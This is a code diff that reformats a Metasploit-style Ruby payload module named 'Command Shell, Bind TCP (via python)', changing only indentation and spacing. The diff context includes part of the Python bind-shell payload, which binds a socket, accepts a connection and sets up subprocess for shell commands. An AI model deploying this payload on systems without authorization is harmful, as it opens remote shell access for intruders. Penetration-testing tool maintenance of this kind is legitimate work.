@@ -1,6 +1,4 @@
-
 module MetasploitModule
-
   CachedSize = :dynamic
 
   include Msf::Payload::Single
@@ -8,22 +6,24 @@ module MetasploitModule
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
-    super(merge_info(info,
-      'Name' => 'Command Shell, Bind TCP (via python)',
-      'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',
-      'Author' => 'mumbai',
-      'License' => MSF_LICENSE,
-      'Platform' => 'python',
-      'Arch' => ARCH_PYTHON,
-      'Handler' => Msf::Handler::BindTcp,
-      'Session' => Msf::Sessions::CommandShell,
-      'PayloadType' => 'python',
-      'Payload' =>
-        {
-          'Offsets' => { },
+    super(
+      merge_info(
+        info,
+        'Name' => 'Command Shell, Bind TCP (via python)',
+        'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',
+        'Author' => 'mumbai',
+        'License' => MSF_LICENSE,
+        'Platform' => 'python',
+        'Arch' => ARCH_PYTHON,
+        'Handler' => Msf::Handler::BindTcp,
+        'Session' => Msf::Sessions::CommandShell,
+        'PayloadType' => 'python',
+        'Payload' => {
+          'Offsets' => {},
           'Payload' => ''
         }
-      ))
+      )
+    )
   end
 
   def generate(_opts = {})
@@ -35,7 +35,7 @@ module MetasploitModule
       import socket as s
       import subprocess as r
       so=s.socket(s.AF_INET,s.SOCK_STREAM)
-      so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))
+      so.bind(('#{datastore['RHOST']}',#{datastore['LPORT']}))
       so.listen(1)
       so,addr=so.accept()
       while True:
@@ -48,5 +48,5 @@ module MetasploitModule
     PYTHON
 
     py_create_exec_stub(cmd)
- end
+  end
 end
